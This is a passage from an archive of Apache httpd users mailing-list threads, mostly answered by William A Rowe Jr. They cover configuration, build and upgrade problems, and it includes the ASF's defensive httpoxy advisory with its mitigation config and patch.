is significant about the volume C:, but there may be something very
significant about the permissions of that volume, etc.

On Fri, Mar 10, 2017 at 7:25 AM, Ishan Thakur
 wrote:
> Hi All,
>
> We are using http-2.2.31 for our application on Windows.
> We are running our application as Local Service on Windows.
> The problem description is as follows:
> “We are setting the documentRoot as “web”(no complete absolute path). This
> works fine for all the paths.
> The paths can be direct drive(D:\). But it fails only for C drive(C:\). The
> same works fine for all other paths(D:\, C:\Program Files…etc)
>
> For C drive, we are getting following error:
>
> Syntax error on line 129 of C:/httpd.conf:
> DocumentRoot must be a directory
> “
> Is there any restriction for C drive on Windows for Apache httpd-2.2.31?
>
> Regards,
> Ishan

-
To unsubscribe, e-mail: users-unsubscr...@httpd.apache.org
For additional commands, e-mail: users-h...@httpd.apache.org

Re: [users@httpd] Apache upgrade on Aix

[William A Rowe Jr]

There is a wealth of information in the build/ and build-1/ (APR)
subdirectories about
the compiler and linker choices that were used to create a build, if
they are preserved.


On Tue, Feb 7, 2017 at 8:38 AM, Chunduru, Krishnachaithanya
 wrote:
> Hi Eric,
>
> Thanks for your reply.
>
> Actually the setup was done long back with a community version by a colleague 
> who left the organization.
>
> would it be possible to know how it was installed ?
>
> Regards,
> Krishna
>
> -Original Message-
> From: Eric Covener [mailto:cove...@gmail.com]
> Sent: Tuesday, February 07, 2017 7:06 PM
> To: users@httpd.apache.org
> Subject: Re: [users@httpd] Apache upgrade on Aix
>
> On Tue, Feb 7, 2017 at 8:09 AM, Chunduru, Krishnachaithanya 
>  wrote:
>> Can someone guide me on how to upgrade the Apache httpd from 2.4.10 to
>> 2.4.16 or later version. I couldn’t find the proper documentation for
>> doing this. Thanks.
>
>
> It depends where your old build came from. If you compiled it yourself, 
> compile it again. If you downloaded a package in lpp or rpm form, hunt for a 
> new one.
>
> --
> Eric Covener
> cove...@gmail.com
>
> -
> To unsubscribe, e-mail: users-unsubscr...@httpd.apache.org
> For additional commands, e-mail: users-h...@httpd.apache.org
>
>
> This message and any attachments are intended only for the use of the 
> addressee and may contain information that is privileged and confidential. If 
> the reader of the message is not the intended recipient or an authorized 
> representative of the intended recipient, you are hereby notified that any 
> dissemination of this communication is strictly prohibited. If you have 
> received this communication in error, please notify us immediately by e-mail 
> and delete the message and any attachments from your system.

-
To unsubscribe, e-mail: users-unsubscr...@httpd.apache.org
For additional commands, e-mail: users-h...@httpd.apache.org

Re: [users@httpd] HTTPOxy vulnerability not posted to announce list?

[William A Rowe Jr]

https://lists.apache.org/list.html?annou...@httpd.apache.org:lte=1y:Httpoxy

was the first release addressing the question by httpd project.

Announce@ lists are used to broadcast release availability, making them
less than ideal channels for this foundation-wide response;

https://www.apache.org/security/asf-httpoxy-response.txt

There are a number of lists, such as bugtraq, which chronical vulnerability
disclosures.

Cheers,

Bill

On Dec 21, 2016 1:20 PM, "Jim Allison" 
wrote:

> Hi,
>
> We recently had a site fail a PCI DSS scan due to the HTTPOxy
> vulnerability and we only received notice of Apache 2.4.25 yesterday. We
> are using 2.2 and a patch has not yet been released for that version.
>
> Going through the history of the announce list, it seems that the advisory
> for HTTPOxy was not posted there. I can see that it was posted to the users
> list back in the summer, but we were only subscribed to the announce list.
> I can see that other vulnerabilities were posted to the announce list last
> year; just not HTTPOxy.
>
> Was this just an oversight, or should we have been subscribed to the users
> list as well to get all the advisories?
>
> Thanks,
>
> Jim Allison | Technical Product Lead | 1-888-400-9185 ext 2214
> SpeedLine Solutions Inc.
> the leader in innovative solutions for pizza and delivery point of sale
>
> www.speedlinesolutions.com
>
> Studies show trees live longer when they're not cut down. Please consider
> before printing.
>
> -
> To unsubscribe, e-mail: users-unsubscr...@httpd.apache.org
> For additional commands, e-mail: users-h...@httpd.apache.org
>
>

Re: [users@httpd] Install and Configure Apache on Windows Server

[William A Rowe Jr]

There is a very recent skeleton on the wiki...
https://wiki.apache.org/httpd/WindowsTrunkCompilation

Aside from obtaining a release tarball, it is more straightforward than
using the msvc studio build schema.

On Nov 3, 2016 15:42, "Robert Ramoutar"  wrote:

>
> Hello all,
>
>
> I have been tasked with Installing and Configuring Apache 2.4 on a windows
> server for the following purpose:
>
>
> 1. Configure SSL through apache
>
>
> 2. Apache Tomcat also installed on server to handle web request to a
> specific web application - MySQL db also on the same server.
>
>
> How does one go about installing and configuring SSL through apache 2.4 on
> Windows Server 2012?
>
>
> I have read so many documents and so many questions on forums etc and is
> now more confused than before.
>
> Can someone please outline the steps require and if possible how to
> perform these steps for apache in Windows.
>
>
> Thanks.
>
> Regards,
>
> Robert Ramoutar.
>
>
>
> This email is intended for the intended recipient(s) and may contain
> confidential information.
> Reproduction, dissemination or distribution of this message is prohibited
> unless authorized by
>  the sender. If you are not the intended recipient, please notify the
> sender immediately and you
> must not read, keep, use, disclose, copy or distribute this email without
> the sender's
>  prior permission.
>
>
>
>
>
>
> --
> *From:* users-h...@httpd.apache.org 
> *Sent:* Thursday, November 3, 2016 10:35 AM
> *To:* robert_ramou...@hotmail.com
> *Subject:* WELCOME to users@httpd.apache.org
>
> Hi! This is the ezmlm program. I'm managing the
> users@httpd.apache.org mailing list.
>
> PLEASE READ!  This message contains information specific to
> this mailing list, and is not your standard form-letter
> subscription acknowledgement.
>
> I have added the address
>
>robert_ramou...@hotmail.com
>
> to the users mailing list.
>
> Welcome to users@httpd.apache.org!
>
> Please save this message so that you know the address you are
> subscribed under, in case you later want to unsubscribe or change your
> subscription address.
>
> This mailing list is maintained by the Apache Software Foundation
> as a forum in which users of the Apache HTTP server can ask each
> other questions, pose problems, and discuss issues.  It is NOT,
> repeat NOT, an official support medium of the Foundation.  Please
> take a look at
>
> 
> to see details about how this list is to be used.
>
> Posting is only permitted by subscribed addresses as an anti-spam
> measure.  The list is moderated by volunteers from the Apache Software
> Foundation; moderation will mostly be notable by its absence.
> However, blatant abuse of the forum's purpose or the sensibilities
> of the subscribers will not be tolerated.  Any actions taken
> by the moderators is final, solely at their discretion, and not
> subject to formal appeal.
>
> So.. be excellent to each other, and party on!
>
> --- Administrative commands for the users list ---
>
> I can handle administrative requests automatically. Please
> do not send them to the list address! Instead, send
> your message to the correct command address:
>
> To subscribe to the list, send a message to:
>
>
> To remove your address from the list, send a message to:
>
>
> Send mail to the following for info and FAQ for this list:
>
>
>
> Similar addresses exist for the digest list:
>
>
>
> To get messages 123 through 145 (a maximum of 100 per request), mail:
>
>
> To get an index with subject and author for messages 123-456 , mail:
>
>
> They are always returned as sets of 100, max 2000 per request,
> so you'll actually get 100-499.
>
> To receive all messages with the same subject as message 12345,
> send a short message to:
>
>
> The messages should contain one line or word of text to avoid being
> treated as sp@m, but I will ignore their content.
> Only the ADDRESS you send to is important.
>
> You can start a subscription for an alternate address,
> for example "john@host.domain", just add a hyphen and your
> address (with '=' instead of '@') after the command word:
> 

[users@httpd] [Advisory] Apache Software Foundation Projects and "httpoxy" CERT VU#797896

[William A Rowe Jr]

Advisory: Apache Software Foundation Projects and "httpoxy" CERT VU#797896

Canonical URL: https://www.apache.org/security/asf-httpoxy-response.txt

Publication: v1.0  18 July 2016


Audience


This Advisory is directed to HTTP web server administrators and users of
the software indicated below, including CGI developers.

This Advisory is not directed to a general audience, especially web browser
users. The issues raised by the "httpoxy" class of vulnerabilities affect
web servers, and are not an issue for consumers of web services to address.


Background
--

The ASF (Apache Software Foundation) offers a number of software packages
which offer HTTP protocol ("Web") requests and responses, and offer the
developer or admininstrator CGI (Common Gateway Interface) routing through
these software packages.

The Apache HTTP Server (httpd and mod_fcgid), Apache Perl (mod_perl) and
Apache Tomcat projects all offer CGI handling of HTTP requests.

The Apache Traffic Server proxies HTTP requests, but offers no CGI support.

Many other ASF projects utilize the HTTP protocol, but at this time we have
not identified any which provide CGI handling, or forward the HTTP "Proxy:"
header implicated in the "httpoxy" class of issues. In the event that other
projects discover such a defect, or can contribute to mitigating this class
of issues, this Advisory will be updated.

Note especially that PHP (http://www.php.net) is not an Apache Software
Foundation project (this is a common point of confusion), and that this
Advisory does not attempt to address third-party software, scripts,
libraries or components affected by the "httpoxy" group of issues.

See https://httpoxy.org/ (not affiliated with the ASF) for a complete
discussion of the "httpoxy" class of issues, which are not reiterated
in this advisory.

The Apache Software Foundation wishes to thank Dominic Scheirlinck
and Scott Geary of Vend for bringing this issue to the attention of
the ASF Security Team for a well-coordinated community response.


Apache HTTP Server (httpd)
--

Apache HTTP Server may be configured to proxy HTTP requests as a forward
or reverse (gateway) proxy server, can proxy requests to a FastCGI service
using mod_proxy_fcgi, can directly serve CGI applications using mod_cgi
or mod_cgid or the related mod_isapi service. The project's mod_fcgid
subproject (available as a separate add-in module) directly manages CGI
scripts using the FastCGI protocol.

It may also be configured to directly host a number of external modules
which run CGI-style applications in-process. The server itself does not
modify the CGI environment in this case, however, these external modules
may perform such modifications of their environment variables in-process.
Such examples include mod_php, mod_perl and mod_wsgi.

To mitigate "httpoxy" issues across all of the above mechanisms, the most
direct solution is to drop any "Proxy:" header arriving from an upstream
proxy server or the origin user-agent. this will mitigate the issue for any
vulnerable back-end server or CGI across all traffic through this server.

The two lines below enabled in the httpd.conf file will remove the "Proxy:"
header from all incoming requests, before further processing;

LoadModule headers_module {path-to}/mod_headers.so

RequestHeader unset Proxy early

(Users who have mod_headers compiled-in to the httpd binary must omit
the LoadModule directive above, others must adjust the {path-to} to point
to the mod_headers.so file.)

If the administrator wishes to preserve the value of the "Proxy:" header
for most traffic, and only eliminate it from the CGI environment variable
HTTP_PROXY, a second mitigation is offered. This patch will address this
behavior in mod_cgi, mod_cgid, mod_isapi, mod_proxy_fcgi and mod_fcgid,
along with all other consumers of httpd's built-in environment handling.

The bundled httpd modules all rely on ap_add_common_vars() to set up the
target CGI environment. The project will include the recommended patch
below in all subsequent releases of httpd, including 2.4.24 and 2.2.32.
Users who build httpd 2.2.x or 2.4.x from source may apply the patch below,
recompile and re-install httpd to obtain this mitigation. This migitation
has been assigned the identifier CVE-2016-5387 .

=== Patch to httpd sources 2.4.x and 2.2.x ===
--- server/util_script.c(revision 1752426)
+++ server/util_script.c(working copy)
@@ -186,6 +186,14 @@ AP_DECLARE(void) ap_add_common_vars(request_rec *r
 else if (!strcasecmp(hdrs[i].key, "Content-length")) {
 apr_table_addn(e, "CONTENT_LENGTH", hdrs[i].val);
 }
+/* HTTP_PROXY collides with a popular envvar used to configure
+ * proxies, don't let clients set/override it.  But, if you must...
+ */
+#ifndef SECURITY_HOLE_PASS_PROXY
+else if (!strcasecmp(hdrs[i].key, "Proxy")) {
+;
+}
+#endif
 

Re: [users@httpd] rpmbuild for httpd-2.4.23 failed missing mod_proxy_fdpass.so

[William A Rowe Jr]

This is a dev@ level regression, sharing with that list. Please confirm you
are using httpd's own rpm. If not, the specific --enable-modules provided
for your rpm.spec file may be at issue.

On Jul 17, 2016 3:45 AM, "kohmoto"  wrote:

> I tried to rpmbuild the former version httpd-2.4.20.tar.bz2 in the same
> machine. The result was successful without error. So, the rpmbuild failure
> of httpd-2.4.23 missing mod_proxy_fdpass.so is not due to my rebuild
> environment. All previous versions gave also successful results.
>
> Messages output during rpmbuild of httpd-2.4.20 are little different from
> httpd-2.4.23.
>
> [httpd-2.4.20]
> checking whether to enable mod_proxy_fdpass... checking dependencies
> checking whether CMSG_DATA is declared... yes
> checking whether to enable mod_proxy_fdpass... shared (all)
>
> [httpd-2.4.23]
> checking whether to enable mod_proxy_fdpass... no
>
> [httpd-2.4.20]
> Building shared: mod_proxy.la mod_proxy_connect.la mod_proxy_ftp.la
> mod_proxy_http.la mod_proxy_fcgi.la mod_proxy_scgi.la mod_proxy_fdpass.la
> mod_proxy_wstunnel.la mod_proxy_ajp.la mod_proxy_balancer.la
> mod_proxy_express.la
>
> [httpd-2.4.23] mod_porxy_fdpass.la is missing
> Building shared: mod_proxy.la mod_proxy_connect.la mod_proxy_ftp.la
> mod_proxy_http.la mod_proxy_fcgi.la mod_proxy_scgi.la
> mod_proxy_wstunnel.la mod_proxy_ajp.la mod_proxy_balancer.la
> mod_proxy_express.la mod_proxy_hcheck.la
>
> [httpd-2.4.20]
> /usr/lib64/apr/build-1/libtool --silent --mode=compile gcc -std=gnu99
> -pthread  -O2 -g -pipe -Wall -Wp,-D_FORTIFY_SOURCE=2 -fexceptions
> -fstack-protector-strong --param=ssp-buffer-size=4 -grecord-gcc-switches
> -m64 -mtune=generic-DLINUX -D_REENTRANT -D_GNU_SOURCE -I.
> -I/home/webadmin/rpmbuild/BUILD/httpd-2.4.20/os/unix
> -I/home/webadmin/rpmbuild/BUILD/httpd-2.4.20/include -I/usr/include/apr-1
> -I/home/webadmin/rpmbuild/BUILD/httpd-2.4.20/modules/aaa
> -I/home/webadmin/rpmbuild/BUILD/httpd-2.4.20/modules/cache
> -I/home/webadmin/rpmbuild/BUILD/httpd-2.4.20/modules/core
> -I/home/webadmin/rpmbuild/BUILD/httpd-2.4.20/modules/database
> -I/home/webadmin/rpmbuild/BUILD/httpd-2.4.20/modules/filters
> -I/home/webadmin/rpmbuild/BUILD/httpd-2.4.20/modules/ldap
> -I/home/webadmin/rpmbuild/BUILD/httpd-2.4.20/server
> -I/home/webadmin/rpmbuild/BUILD/httpd-2.4.20/modules/loggers
> -I/home/webadmin/rpmbuild/BUILD/httpd-2.4.20/modules/lua
> -I/home/webadmin/rpmbuild/BUILD/httpd-2.4.20/modules/proxy
> -I/home/webadmin/rpmbuild/BUILD/httpd-2.4.20/modules/session
> -I/home/webadmin/rpmbuild/BUILD/httpd-2.4.20/modules/ssl
> -I/home/webadmin/rpmbuild/BUILD/httpd-2.4.20/modules/test
> -I/home/webadmin/rpmbuild/BUILD/httpd-2.4.20/server
> -I/home/webadmin/rpmbuild/BUILD/httpd-2.4.20/modules/arch/unix
> -I/home/webadmin/rpmbuild/BUILD/httpd-2.4.20/modules/dav/main
> -I/home/webadmin/rpmbuild/BUILD/httpd-2.4.20/modules/generators
> -I/home/webadmin/rpmbuild/BUILD/httpd-2.4.20/modules/mappers -prefer-pic -c
> mod_proxy_fdpass.c && touch mod_proxy_fdpass.slo
> /usr/lib64/apr/build-1/libtool --silent --mode=link gcc -std=gnu99
> -pthread  -O2 -g -pipe -Wall -Wp,-D_FORTIFY_SOURCE=2 -fexceptions
> -fstack-protector-strong --param=ssp-buffer-size=4 -grecord-gcc-switches
> -m64 -mtune=generic -Wl,-z,relro-o mod_proxy_fdpass.la -rpath
> /usr/lib64/httpd/modules -module -avoid-version  mod_proxy_fdpass.lo
>
> [httpd-2.4.23]
> no complile, no link
>
> [httpd-2.4.20]
> /usr/lib64/apr/build-1/libtool --silent --mode=install install
> mod_proxy_fdpass.la
> /home/webadmin/rpmbuild/BUILDROOT/httpd-2.4.20-1.x86_64/usr/lib64/httpd/modules/
>
> [httpd-2.4.23]
> no install
>
> I hope these findings would be a little help to understand the rpmbuild
> error.
>
> Yours truly,
> Kazuhiko Kohmoto
>
>
> -
> To unsubscribe, e-mail: users-unsubscr...@httpd.apache.org
> For additional commands, e-mail: users-h...@httpd.apache.org
>
>

Re: [users@httpd] Apache fails to start after updating openssl from 1.0.1j to 1.0.2g

[William A Rowe Jr]

There was a well-documented binary breakage in 1.0.2g that has already
been fixed in their source repository for the next openssl upgrades.

That fix is here;
https://github.com/openssl/openssl/commit/133138569f37d149ed1d7641fe8c75a93fded445


On Mon, Mar 14, 2016 at 12:05 PM, Ron Hawkins  wrote:

> Hello, I tried updating the version of OpenSSL on my Apache web server
> from 1.0.1j to 1.0.2g and now the web server won't start (actually I
> dropped back so I'm not totally freaking out).  It appears to be failing
> before it can write to the error log.  To update I simply copied
> openssl.exe, libeay32.dll, and ssleay32.dll to the \Apache\bin folder.
>
> Here are the pertinent details on my server:
>  Windows 2008 R2
>  Apache 2.2.6 (Win32)
>  Openssl 1.0.2g binaries downloaded from
> https://indy.fulgan.com/SSL/openssl-1.0.2g-i386-win32.zip
>  I also tried
> https://indy.fulgan.com/SSL/openssl-1.0.1s-i386-win32.zip with the same
> results.
>
> I have a dev server running Apache 2.4.12 and it updated successfully.
>
> Is there a compatibility problem with Apache 2.2.6 and OpenSSL 1.0.2g?
> I'm considering upgrading Apache to find out, but I don't want to take my
> site down any more than I have to.
>
> Ron
>
>
> -
> To unsubscribe, e-mail: users-unsubscr...@httpd.apache.org
> For additional commands, e-mail: users-h...@httpd.apache.org
>
>

Re: [users@httpd] SNI SSL per domain?

[William A Rowe Jr]

Sounds like you have mis-structured the config.  Per servername - each can
and should have its own cert and will be selected via SNI.  If there are
subadmins beneath each vhost section #include those snippets and they all
still fall within the given host name.
On Feb 1, 2016 11:21 AM, "Felipe Gasper"  wrote:

> On 1 Feb 2016 12:16 PM, Oscar Knorn wrote:
>
>> On 2016/02/01 Felipe Gasper wrote:
>>
>>> Hello,
>>>
>>>  Is it possible to do SNI SSL per domain rather than per vhost? If
>>> not, is there a feature request in for this?
>>>
>>>  Thank you!
>>>
>>> -Felipe Gasper
>>> Houston, TX
>>>
>>> -
>>> To unsubscribe, e-mail: users-unsubscr...@httpd.apache.org
>>> For additional commands, e-mail: users-h...@httpd.apache.org
>>>
>>>
>>
>> Hello Felipe,
>>
>> are'nt in your configuration the domains organized in vhost sections
>> yet? Do you think, there might be a reason you can't organize them that
>> way?
>>
>> Cheers Oscar
>>
>
> Hi Oscar,
>
> Thanks for responding!
>
> We have end users customizing their own vhost configurations via a
> limited-access interface; hence, I can’t put one domain per vhost.
>
> -F
>
> -
> To unsubscribe, e-mail: users-unsubscr...@httpd.apache.org
> For additional commands, e-mail: users-h...@httpd.apache.org
>
>

Re: [users@httpd] Blocking of users [was: Apache Server Access]

[William A Rowe Jr]

Precisely.  We are likely to be switching mailing list mgmt platforms very
soon, with luck we can preserve the subscribed address in such a way that
unsubscribing users is less of a hassle.  Right now the embedded
list-unsubscribe fails to suggest the specific email address that needs to
be unlinked.

Third party subscriptions, unintentional or harassing the individual or the
list, will happen.  Let's assume the best intentions of users stuck in a
list, please.
On Jan 11, 2016 08:00, "Tobias Adolph"  wrote:

> Hi,
>
> Am 11.01.2016 um 14:07 schrieb Yehuda Katz:
>
> It's unfortunate that people can't figure out how to unsubscribe from a
> mailing list that they subscribed to in the first place.
>
>
> Maybe the person yelling isn't the same who subscribed to the list...
> i...@idealgourmet.es sounds not like an address that is dedicated to one
> person only. Maybe an employee subscribed a long time ago and now the
> person currently responsible for the inbox is just unable to cope with all
> this - in his or her eyes - weird tech stuff.
>
> Therefore my proposal to manually remove/block the address. But it seems
> that this has happened.
>
> Kind regards,
> Tobias
>

Fwd: [users@httpd] Possible virus via httpd server

[William A Rowe Jr]

Is there a kind soul fluent enough Spanish to write a note to this user and
help them out of their perhaps-unsolicited subscription in their native
tongue?

Two polite attempts to reach them have failed completely, so I'm simply
going to filter this sender to /dev/null, sigh.

Speaking of Spanish, there is an offer for new translations of httpd that
we would love proof-reading help with, if you are interested.  Please join
up with d...@httpd.apache.org if you would like to help review translated
docs pages!

Cheers,

Bill


-- Forwarded message --
From: William A Rowe Jr <wr...@rowe-clan.net>
Date: Wed, Jan 6, 2016 at 4:39 PM
Subject: Re: [users@httpd] Possible virus via httpd server
To: IdealGourmet <i...@idealgourmet.es>


Dear reader,

I am a project member at Apache, and I ask you to pay close attention.  I
want you to help you *stop* receiving emails from apache.org.

I offered you help last month, you didn't follow up.

I NEED you to FORWARD me one of these emails *as an attachment*.  If I see
the attachment, it will tell me *how* you are subscribed and *where* the
email was directed.  It was not directed to you and was not emailed to
i...@idealgourmet.es because that email is not a subscriber.

Otherwise, please tell me instead what email addresses forward to your info@
email account?  I will hunt those down and remove them from the subscriber
list.

But if you don't follow these instructions I simply cannot help you :(

If it would help, I can pass this on to a speaker of Espanol for easier
communications?

Kindly yours,

Bill

On Mon, Jan 4, 2016 at 2:44 PM, IdealGourmet <i...@idealgourmet.es> wrote:

> Stop to send emails in this adress You make an
> error!!!
>
> -Mensaje original-
> De: Michael D. Berger [mailto:m.d.ber...@ieee.org]
> Enviado el: lundi 4 janvier 2016 21:42
> Para: users@httpd.apache.org; frazier...@sbcglobal.net
> Asunto: RE: [users@httpd] Possible virus via httpd server
>
> I tried the submission you suggest.  It said it is an executable file,
> suitable for my Linux box.  I don't think I am about to run it.  Note that
> my ESET NOD32 virus software finds nothing wrong with it.
>
> Thanks,
> Mike.
> --
> Michael D. Berger
> m.d.ber...@ieee.org
> http://www.rosemike.net/
>
>
> > -Original Message-
> > From: Kent Frazier [mailto:frazier...@sbcglobal.net]
> > Sent: Monday, January 04, 2016 13:57
> > To: users@httpd.apache.org
> > Subject: Re: [users@httpd] Possible virus via httpd server
> >
> >
> > You might try submitting the file at
> > https://www.virustotal.com and see what it detects.
> >
> > On 1/4/16 8:18 AM, Michael D. Berger wrote:
> > > Examining with Lemmy (A Windows version of VI), it looks
> > like a binary file.
> > > Size is 181.4 KB.
> > > I am considering my favorite virus remover: DBAN, but it would take
> > > several days work to recover from that.
> > >
> > > Mike.
> > > --
> > > Michael D. Berger
> > > m.d.ber...@ieee.org
> > > http://www.rosemike.net/
> > >
> > >
> > >> -Original Message-
> > >> From: Daniel Beardsmore [mailto:dan...@trustnetworks.co.uk]
> > >> Sent: Monday, January 04, 2016 05:03
> > >> To: users@httpd.apache.org
> > >> Subject: RE: [users@httpd] Possible virus via httpd server
> > >>
> > >> Well, what do you see if you examine the file in a text editor?
> > >>
> > >>> -Original Message-
> > >>> From: Michael D. Berger [mailto:m.d.ber...@ieee.org]
> > >>> Sent: 04 January 2016 05:03
> > >>> To: Apache-Users
> > >>> Subject: [users@httpd] Possible virus via httpd server
> > >>>
> > >>> Using my WinXP Firefox client to access my previously
> > working httpd
> > >>> 2.4 server on Fedora 23 gets a file named 1OfvyQ5L instead of my
> > >>> index.html .  Do you think I have a virus on my Linux box?  I did
> > >>> notice that my iptables is not as tight as it should be.
> > >>>
> > >>> --
> > >>> Michael D. Berger
> > >>> m.d.ber...@ieee.org
> > >>> http://www.rosemike.net/
> > >>>
> > >>>
> > >>>
> > >>>
> > >>
> > -
> > >>
> > >>
> >
> >
> >
> >
> > -
> > To unsubscribe, e-mail: users-unsubscr...@httpd.apache.org
> > For additional commands, e-mail: users-h...@httpd.apache.org
> >
> >
>
>
> -
> To unsubscribe, e-mail: users-unsubscr...@httpd.apache.org
> For additional commands, e-mail: users-h...@httpd.apache.org
>
>
>
> -
> To unsubscribe, e-mail: users-unsubscr...@httpd.apache.org
> For additional commands, e-mail: users-h...@httpd.apache.org
>
>

Re: [users@httpd] Circumstances when mod_php would run faster than PHP-FPM?

[William A Rowe Jr]

Mod_proxy_fcgi + php-fpm or mod_fcgid with php fcgi sapi should both be
equivalent when tuned correctly.

Your only option for running php in process efficiently is to use the
non-threadsafe php in the httpd preform module.  Your only option for
running httpd efficiently is the event, or at least the worker mpm.

Since usually only a subset of the http requests are to a php resource, the
answer is almost always 'no'.
On Jan 8, 2016 16:48, "Rose, John B"  wrote:

> Apache 2.4
>
> On the same system, same web site, are there circumstances when Apache
> using mod_php would run faster than Apache using PHP-FPM?
>
> Thanks
>

Re: [users@httpd] ProxyPass + Redirect

[William A Rowe Jr]

On Wed, Dec 16, 2015 at 4:34 PM, Christopher Schultz <
ch...@christopherschultz.net> wrote:

>
>RedirectMatch ^/foo(/)?$ /foo/someplace_specific.html
>RedirectMatch ^/foo/index.html$ /foo/someplace_specific.html
>ProxyPass /foo/index.html !
>ProxyPass /foo/ http://localhost:8009/foo/
>ProxyPassReverse /foo/ http://localhost:8009/foo/
>
> Unfortunately, this doesn't seem to be working for me: a request for
> /foo/index.html gives me a 404 error *and a JSESSIONID from Tomcat*, so
> I'm fairly certain that the request is being proxied.
>

I thought this was order-sensitive, try reversing the two ProxyPass
statements.

Re: [users@httpd] Buffer overrun in Apache 2.4.7-2.4.17

[William A Rowe Jr]

On Tue, Dec 15, 2015 at 2:34 PM, Mike Pastore  wrote:

> Hi folks,
>
> I believe I've found a buffer overrun affecting (at least) Apache 2.4.7
> and 2.4.17. I don't know enough about this sort of thing to determine how
> serious it is and whether or not it is a potential security vulnerability.
> If someone would please work with me to validate my findings and help me
> handle it responsibly, I would greatly appreciate it.
>

The only maintained version is 2.4.x branch, which corresponds to 2.4.18
right now, or 2.2.31.  Anything older that is no longer vulnerable we treat
as non-sequitur, potentially a problem but not applicable to the shipping
flavors..

We would love for you to reproduce and share at secur...@httpd.apache.org
to confirm or reject the suggested exploit, and we do appreciate responsible
disclosure.

Re: [users@httpd] Apache2 does not properly start

[William A Rowe Jr]

It's been too many years since I and others have looked at 2.4.7, if you
can try this on a modern release of httpd and share those error logs, be
glad to review.

Bill
On Dec 10, 2015 10:40 AM, "LVDave"  wrote:

> I have an Apache2 install (v2.4.7) running on Ubuntu 14.04 (32bit)
> that had been working fine up till I added SSL support and certs from
> LetsEncrypt. Previously all traffic was port 80 http.. What I get when
> trying to start Apache2 is the following
>
> root@vm4:/home/dave# service apache2 start
>  * Starting web server apache2
>
>  *
>  * The apache2 instance did not start within 20 seconds. Please read
> the log files to discover problems
>
> After this message prints on the console, I see the normal apache2
> processes in ps xua, however if I try to stop it via "service apache2
> stop", I get a warning message about unknown pids and that apache2
> will not be stopped. I do a killall apache2 to stop them.
>
> In the default "info" logging config I got nothing in
> /var/log/apache2/error.log, so I changed to debug logging, and get the
> following:
>
> [Thu Dec 10 08:14:03.452466 2015] [mpm_prefork:notice] [pid 30384]
> AH00169: caught SIGTERM, shutting down
> [Thu Dec 10 08:14:42.753394 2015] [ssl:debug] [pid 30534]
> ssl_engine_pphrase.c(181): AH02199: SSL not enabled on vhost
> vm4.bestnewage.net:80, skipping SSL setup
> [Thu Dec 10 08:14:42.753511 2015] [ssl:debug] [pid 30534]
> ssl_engine_pphrase.c(181): AH02199: SSL not enabled on vhost
> ruddfoundationnv.org:80, skipping SSL setup
> [Thu Dec 10 08:14:42.753943 2015] [ssl:debug] [pid 30534]
> ssl_engine_pphrase.c(239): AH02202: Init: Read server certificate from
> '/etc/letsencrypt/live/www.ruddfoundationnv.org/cert.pem'
> [Thu Dec 10 08:14:42.754337 2015] [ssl:info] [pid 30534] AH01887:
> Init: Initializing (virtual) servers for SSL
> [Thu Dec 10 08:14:42.755218 2015] [ssl:info] [pid 30534] AH01876:
> mod_ssl/2.4.7 compiled against Server: Apache/2.4.7, Library:
> OpenSSL/1.0.1f
> [Thu Dec 10 08:14:42.789658 2015] [ssl:debug] [pid 30535]
> ssl_engine_pphrase.c(181): AH02199: SSL not enabled on vhost
> vm4.bestnewage.net:80, skipping SSL setup
> [Thu Dec 10 08:14:42.789721 2015] [ssl:debug] [pid 30535]
> ssl_engine_pphrase.c(181): AH02199: SSL not enabled on vhost
> ruddfoundationnv.org:80, skipping SSL setup
> [Thu Dec 10 08:14:42.789967 2015] [ssl:debug] [pid 30535]
> ssl_engine_pphrase.c(239): AH02202: Init: Read server certificate from
> '/etc/letsencrypt/live/xxx/cert.pem'
> [Thu Dec 10 08:14:42.790200 2015] [socache_shmcb:debug] [pid 30535]
> mod_socache_shmcb.c(389): AH00821: shmcb_init allocated 512000 bytes
> of shared memory
> [Thu Dec 10 08:14:42.790234 2015] [socache_shmcb:debug] [pid 30535]
> mod_socache_shmcb.c(405): AH00822: for 511944 bytes (512000 including
> header), recommending 32 subcaches, 88 indexes each
> [Thu Dec 10 08:14:42.790249 2015] [socache_shmcb:debug] [pid 30535]
> mod_socache_shmcb.c(438): AH00824: shmcb_init_memory choices follow
> [Thu Dec 10 08:14:42.790256 2015] [socache_shmcb:debug] [pid 30535]
> mod_socache_shmcb.c(440): AH00825: subcache_num = 32
> [Thu Dec 10 08:14:42.790261 2015] [socache_shmcb:debug] [pid 30535]
> mod_socache_shmcb.c(442): AH00826: subcache_size = 15992
> [Thu Dec 10 08:14:42.790266 2015] [socache_shmcb:debug] [pid 30535]
> mod_socache_shmcb.c(444): AH00827: subcache_data_offset = 2128
> [Thu Dec 10 08:14:42.790271 2015] [socache_shmcb:debug] [pid 30535]
> mod_socache_shmcb.c(446): AH00828: subcache_data_size = 13864
> [Thu Dec 10 08:14:42.790276 2015] [socache_shmcb:debug] [pid 30535]
> mod_socache_shmcb.c(448): AH00829: index_num = 88
> [Thu Dec 10 08:14:42.790378 2015] [socache_shmcb:info] [pid 30535]
> AH00830: Shared memory socache initialised
> [Thu Dec 10 08:14:42.790405 2015] [ssl:info] [pid 30535] AH01887:
> Init: Initializing (virtual) servers for SSL
> [Thu Dec 10 08:14:42.791157 2015] [ssl:info] [pid 30535] AH01876:
> mod_ssl/2.4.7 compiled against Server: Apache/2.4.7, Library:
> OpenSSL/1.0.1f
> [Thu Dec 10 08:14:42.793544 2015] [mpm_prefork:notice] [pid 30535]
> AH00163: Apache/2.4.7 (Ubuntu) PHP/5.5.9-1ubuntu4.14 OpenSSL/1.0.1f
> configured -- resuming normal operations
> [Thu Dec 10 08:14:42.793590 2015] [mpm_prefork:info] [pid 30535]
> AH00164: Server built: Oct 14 2015 14:18:49
> [Thu Dec 10 08:14:42.793604 2015] [core:notice] [pid 30535] AH00094:
> Command line: '/usr/sbin/apache2'
> [Thu Dec 10 08:14:42.793609 2015] [mpm_prefork:debug] [pid 30535]
> prefork.c(995): AH00165: Accept mutex: sysvsem (default: sysvsem)
>
> Despite the startup message, Apache2 seems to work fine, but I'm
> extremely puzzled as to WHY this is happening..
>
> Help?
>
> Thanks
> Dave
>
> -
> To unsubscribe, e-mail: users-unsubscr...@httpd.apache.org
> For additional commands, e-mail: users-h...@httpd.apache.org
>
>

Re: [users@httpd] explicitly including other ciphers for use with https

[William A Rowe Jr]

On Tue, Dec 8, 2015 at 10:45 AM, Ron Croonenberg  wrote:

> I forgot,  is there a "standard way" to create an rpm so I can install the
> binaries somewhere?
>

Well, all the major linux distributions have their own forks, their own
'one right
